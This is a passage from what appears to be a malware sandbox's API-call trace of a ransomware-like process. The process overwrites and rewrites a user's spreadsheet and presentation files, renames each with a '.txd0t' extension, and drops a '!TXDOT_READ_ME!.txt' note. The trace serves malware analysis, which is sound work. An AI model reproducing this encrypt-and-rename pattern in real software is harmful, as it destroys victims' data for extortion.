returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\CNnaWo_J.xls.txd0t" [0074.674] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\CNnaWo_J.xls.txd0t") returned 0 [0074.674] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\CNnaWo_J.xls", dwFileAttributes=0x80) returned 1 [0074.674] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\CNnaWo_J.xls" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\cnnawo_j.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0074.674] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=7603) returned 1 [0074.674] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.674] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.675] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffe04d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.675] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x1db0, lpNumberOfBytesRead=0x37ff410, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff410*=0x1db0, lpOverlapped=0x0) returned 1 [0074.675] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffe250, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.675] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x1db0, lpNumberOfBytesWritten=0x37ff414, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff414*=0x1db0, lpOverlapped=0x0) returned 1 [0074.676] FlushFileBuffers (hFile=0x460) returned 1 [0074.680] GetProcessHeap () returned 0xe30000 [0074.680] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x13c) returned 0xe9b648 [0074.680] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\CNnaWo_J.xls" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\CNnaWo_J.xls") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\CNnaWo_J.xls" [0074.680] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\CNnaWo_J.xls") returned="CNnaWo_J.xls" [0074.681] StrCpyW (in: psz1=0xe9b6c4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.681] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\!TXDOT_READ_ME!.txt") returned 0 [0074.681] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\!TXDOT_READ_ME!.txt" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x478 [0074.681] WriteFile (in: hFile=0x478, lpBuffer=0x37ff444*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x37ff444*, lpNumberOfBytesWritten=0x37ff440*=0x2, lpOverlapped=0x0) returned 1 [0074.682] FlushFileBuffers (hFile=0x478) returned 1 [0074.684] WriteFile (in: hFile=0x478, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x37ff440*=0x7f0, lpOverlapped=0x0) returned 1 [0074.685] FlushFileBuffers (hFile=0x478) returned 1 [0074.686] CloseHandle (hObject=0x478) returned 1 [0074.686] GetProcessHeap () returned 0xe30000 [0074.686] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0074.686] CloseHandle (hObject=0x460) returned 1 [0074.688] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\CNnaWo_J.xls" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\cnnawo_j.xls"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\CNnaWo_J.xls.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\cnnawo_j.xls.txd0t")) returned 1 [0074.688] SetEvent (hEvent=0x3f8) returned 1 [0074.688] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.689] StrCpyW (in: psz1=0x37ff450, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\EPWE.xlsx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\EPWE.xlsx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\EPWE.xlsx" [0074.689] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\EPWE.xlsx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\EPWE.xlsx.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\EPWE.xlsx.txd0t" [0074.689] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\EPWE.xlsx.txd0t") returned 0 [0074.689] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\EPWE.xlsx", dwFileAttributes=0x80) returned 1 [0074.690] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\EPWE.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\epwe.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0074.690] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=22760) returned 1 [0074.690] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.690] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.691] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffa518, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.691] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x58e0, lpNumberOfBytesRead=0x37ff410, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff410*=0x58e0, lpOverlapped=0x0) returned 1 [0074.691] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffa720, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.691] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x58e0, lpNumberOfBytesWritten=0x37ff414, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff414*=0x58e0, lpOverlapped=0x0) returned 1 [0074.691] FlushFileBuffers (hFile=0x460) returned 1 [0074.693] GetProcessHeap () returned 0xe30000 [0074.693] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x136) returned 0xe9b648 [0074.693] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\EPWE.xlsx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\EPWE.xlsx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\EPWE.xlsx" [0074.693] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\EPWE.xlsx") returned="EPWE.xlsx" [0074.693] StrCpyW (in: psz1=0xe9b6c4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.693] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\!TXDOT_READ_ME!.txt") returned 1 [0074.694] GetProcessHeap () returned 0xe30000 [0074.694] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0074.694] CloseHandle (hObject=0x460) returned 1 [0074.695] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\EPWE.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\epwe.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\EPWE.xlsx.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\epwe.xlsx.txd0t")) returned 1 [0074.695] SetEvent (hEvent=0x3f8) returned 1 [0074.696] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.697] StrCpyW (in: psz1=0x37ff450, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\JzVy_5xEKQ.xlsx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\JzVy_5xEKQ.xlsx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\JzVy_5xEKQ.xlsx" [0074.697] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\JzVy_5xEKQ.xlsx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\JzVy_5xEKQ.xlsx.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\JzVy_5xEKQ.xlsx.txd0t" [0074.697] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\JzVy_5xEKQ.xlsx.txd0t") returned 0 [0074.697] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\JzVy_5xEKQ.xlsx", dwFileAttributes=0x80) returned 1 [0074.697] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\JzVy_5xEKQ.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\jzvy_5xekq.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0074.698] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=25944) returned 1 [0074.698] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.698] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.699] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffff98a8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.699] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x6550, lpNumberOfBytesRead=0x37ff410, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff410*=0x6550, lpOverlapped=0x0) returned 1 [0074.699] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffff9ab0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.699] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x6550, lpNumberOfBytesWritten=0x37ff414, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff414*=0x6550, lpOverlapped=0x0) returned 1 [0074.699] FlushFileBuffers (hFile=0x460) returned 1 [0074.703] GetProcessHeap () returned 0xe30000 [0074.703] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x142) returned 0xe9b648 [0074.703] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\JzVy_5xEKQ.xlsx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\JzVy_5xEKQ.xlsx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\JzVy_5xEKQ.xlsx" [0074.703] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\JzVy_5xEKQ.xlsx") returned="JzVy_5xEKQ.xlsx" [0074.703] StrCpyW (in: psz1=0xe9b6c4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.703] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\!TXDOT_READ_ME!.txt") returned 1 [0074.703] GetProcessHeap () returned 0xe30000 [0074.703] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0074.703] CloseHandle (hObject=0x460) returned 1 [0074.704] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\JzVy_5xEKQ.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\jzvy_5xekq.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\JzVy_5xEKQ.xlsx.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\jzvy_5xekq.xlsx.txd0t")) returned 1 [0074.705] SetEvent (hEvent=0x3f8) returned 1 [0074.705] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.706] StrCpyW (in: psz1=0x37ff450, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\M24gnx.pps" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\M24gnx.pps") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\M24gnx.pps" [0074.706] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\M24gnx.pps", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\M24gnx.pps.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\M24gnx.pps.txd0t" [0074.706] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\M24gnx.pps.txd0t") returned 0 [0074.706] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\M24gnx.pps", dwFileAttributes=0x80) returned 1 [0074.707] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\M24gnx.pps" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\m24gnx.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0074.707] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=47782) returned 1 [0074.707] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.707] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.708] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffff435a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.708] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xbaa0, lpNumberOfBytesRead=0x37ff410, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff410*=0xbaa0, lpOverlapped=0x0) returned 1 [0074.709] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffff4560, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.709] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xbaa0, lpNumberOfBytesWritten=0x37ff414, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff414*=0xbaa0, lpOverlapped=0x0) returned 1 [0074.709] FlushFileBuffers (hFile=0x460) returned 1 [0074.712] GetProcessHeap () returned 0xe30000 [0074.712] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x138) returned 0xe9b648 [0074.712] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\M24gnx.pps" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\M24gnx.pps") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\M24gnx.pps" [0074.712] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\M24gnx.pps") returned="M24gnx.pps" [0074.712] StrCpyW (in: psz1=0xe9b6c4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.712] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\!TXDOT_READ_ME!.txt") returned 1 [0074.712] GetProcessHeap () returned 0xe30000 [0074.712] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0074.712] CloseHandle (hObject=0x460) returned 1 [0074.714] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\M24gnx.pps" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\m24gnx.pps"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\M24gnx.pps.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\m24gnx.pps.txd0t")) returned 1 [0074.714] SetEvent (hEvent=0x3f8) returned 1 [0074.714] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.715] StrCpyW (in: psz1=0x37ff450, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\MXMHgMI.ods" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\MXMHgMI.ods") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\MXMHgMI.ods" [0074.715] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\MXMHgMI.ods", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\MXMHgMI.ods.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\MXMHgMI.ods.txd0t" [0074.715] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\MXMHgMI.ods.txd0t") returned 0 [0074.715] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\MXMHgMI.ods", dwFileAttributes=0x80) returned 1 [0074.716] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\MXMHgMI.ods" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\mxmhgmi.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0074.716] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=83344) returned 1 [0074.716] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.716] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.717] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffeb870, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.717] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x14590, lpNumberOfBytesRead=0x37ff410, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff410*=0x14590, lpOverlapped=0x0) returned 1 [0074.719] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffeba70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.719] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x14590, lpNumberOfBytesWritten=0x37ff414, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff414*=0x14590, lpOverlapped=0x0) returned 1 [0074.719] FlushFileBuffers (hFile=0x460) returned 1 [0074.721] GetProcessHeap () returned 0xe30000 [0074.721] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x13a) returned 0xe9b648 [0074.721] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\MXMHgMI.ods" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\MXMHgMI.ods") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\MXMHgMI.ods" [0074.721] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\MXMHgMI.ods") returned="MXMHgMI.ods" [0074.721] StrCpyW (in: psz1=0xe9b6c4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.721] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\!TXDOT_READ_ME!.txt") returned 1 [0074.721] GetProcessHeap () returned 0xe30000 [0074.722] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0074.722] CloseHandle (hObject=0x460) returned 1 [0074.724] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK 